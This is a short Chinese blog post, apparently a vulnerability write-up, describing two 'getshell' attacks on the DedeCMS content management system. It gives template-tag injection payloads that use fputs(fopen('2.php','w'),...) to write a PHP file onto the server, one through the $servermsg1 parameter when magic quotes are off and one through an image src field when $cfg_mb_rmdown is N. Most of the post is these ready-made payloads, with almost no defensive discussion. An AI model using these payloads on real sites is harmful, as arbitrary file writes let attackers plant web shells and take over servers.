dedecms鸡肋getshell

一枚gpc off的getshell,一枚管理员修改了某个配置的getshell,唉,都是鸡肋!

gpc off 的getshell

其中的$servermsg1毫无过滤的进入了$url中
构造好$servermsg1=’}x{/dede:link}{dede:yy520 name\=”‘]=0;fputs(fopen(‘2.php’,’w’),’justforfun’);//”}yy520{/dede:yy520}

在plus 底下就可以生成一个2.php

当$cfg_mb_rmdown 为N的时候的getshell

构造
formhtml为1
imagabody为
src=http://{/dede:img}{dede:yy520 name\=”‘]=0;fputs(fopen(‘2.php’,’w’),’justforfun’);//”}yy520{/dede:yy520}.jpg

原文链接:,转发请注明来源!

发表评论

要发表评论,您必须先登录